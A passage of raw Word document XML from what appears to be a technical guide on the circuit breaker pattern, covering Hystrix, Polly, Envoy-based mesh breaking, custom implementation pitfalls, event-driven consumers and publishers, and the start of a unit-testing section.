    </w:p>
    <w:p w14:paraId="7A8DF621" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1072"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Real-time streaming metrics:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Dashboard showing all circuit breaker states live.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3328488D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why deprecated:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B741248" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1073"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Complex, opinionated (mandated thread pool isolation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEE0B75" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1073"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>High overhead (thread pool per dependency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3A3CEE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1073"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Resilience4j is lighter, more flexible, and actively maintained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E403D7F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.3 Polly (.NET)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7183EC1A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D059FC6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1074"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Policy-based approach. Circuit breaker is one of many composable "policies."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCF525D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1074"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Policies wrap delegates (functions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B976EC3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1074"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Advanced features: PolicyWrap (compose multiple policies), context passing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B80F26C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1074"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Integrates with HttpClientFactory in .NET.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE1134B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.4 Envoy Proxy (Service Mesh Layer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ADFA09" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Circuit breaking at the infrastructure layer — no application code changes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5E2AA6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1075"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Configured via control plane (Istio VirtualService/DestinationRule).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4996F40D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1075"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Applied transparently by the sidecar proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1D7715" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1075"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Combines connection-level limits + outlier detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686E2ABB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1075"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Every service gets circuit breaking "for free" by being in the mesh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656A3A6C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantage:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Polyglot — works regardless of application language (Java, Go, Python, Node.js). The circuit breaker is in the proxy, not the app.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3750300E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.5 Custom Implementation Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A50555E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>If you must build your own (for languages without a good library):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E7A72E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Essential components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500553BF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Thread-safe state machine (closed/open/half-open).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776A9D86" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Sliding window (ring buffer with time-based buckets).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502A2766" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Atomic state transitions (CAS operations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C36487F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Timer for open → half-open transition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4988252D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Configuration (externalized, runtime-tunable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0706FEB3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Metrics emission (for monitoring).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3265DA37" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Fallback mechanism (composable with the breaker).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08714ADF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common mistakes in custom implementations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D520D26" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1077"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Forgetting thread safety (race conditions on state transitions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCF573A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1077"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Using wall clock time (affected by NTP jumps — use monotonic clock).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60521F9D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1077"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Not handling the transition from half-open → open atomically (multiple probes can succeed simultaneously, multiple threads try to close).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4993B82E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1077"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Memory leaks in the sliding window (old buckets not being cleaned up).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430D9700" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="23460E70">
          <v:rect id="_x0000_i4256" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B66B01E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15. Circuit Breaker in Event-Driven Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7F55ED" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.1 Circuit Breaker for Message Consumers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091035A6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE6DEE5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>A message consumer reads from a queue and calls a downstream service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D01DCDF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1078"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Message arrives → Consumer calls downstream → Downstream is down → Call fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B831D25" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1078"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Consumer NACKs the message (don't acknowledge) → Message re-queued.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3001EEE2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1078"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Consumer immediately reads the same message → Same failure → NACK → Re-queue → Infinite loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553610CB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This creates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162F1A89" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1079"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Massive retry load on the downstream (already struggling).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2819A4A1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1079"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Consumer CPU burning on constant retry loops.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACD8A6E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1079"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Message queue filling up (messages not being processed, new ones still arriving).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4484EA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Circuit Breaker solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ABCEA9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67241870" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Consumer reads message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECA6204" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  → Circuit Breaker check:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651F31C8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    - If CLOSED: process message (call downstream)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C5A915" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    - If OPEN: DON'T process. Pause consumption for wait_duration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F48C41" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">      (or move message to a delay queue / DLQ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB57CBF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Implementation options when circuit is open:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267F6AC7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1080"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pause consumer:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Stop reading from the queue entirely. Messages accumulate (but aren't lost). Resume when circuit transitions to half-open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01302166" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1080"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Delay queue:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Move messages to a delayed retry queue (delivered again in 30 seconds). Continue processing other messages that don't depend on the broken downstream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7DF603" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1080"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dead letter queue (DLQ):</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> After N failed attempts, move to DLQ for manual intervention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31538E29" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1080"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Backoff the consumer polling:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Instead of stopping entirely, slow down read rate (poll every 5 seconds instead of continuously).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D817B4B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.2 Circuit Breaker for Event Publishers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B63DDE1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6143B2B7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Your service needs to publish an event to a message broker (Kafka), but Kafka is down:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2BF63C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Without circuit breaker: each publish attempt takes 30 seconds (timeout) → thread blocked → thread pool exhaustion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A92613F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>With circuit breaker: after detecting Kafka is down, immediately fail publishes → free threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA974B1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fallback for publish failures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEE9D18" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1082"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Write to a local WAL (file on disk). Replay to Kafka when the circuit closes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0D5FAF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1082"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Buffer in memory (with bounded queue). Flush to Kafka on recovery. Risk: data loss if the process crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081C9EBC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1082"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Write to a local database "outbox" table. A separate process sends to Kafka when available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0243D3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="51A4AA84">
          <v:rect id="_x0000_i4257" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF0D1F6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16. Testing Circuit Breakers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B3C22E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.1 Unit Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122D2346" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What to test:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AEEF9F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1083"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>State transitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2B93A3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1083"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Start CLOSED. Inject N failures. Verify state → OPEN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CB84C5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
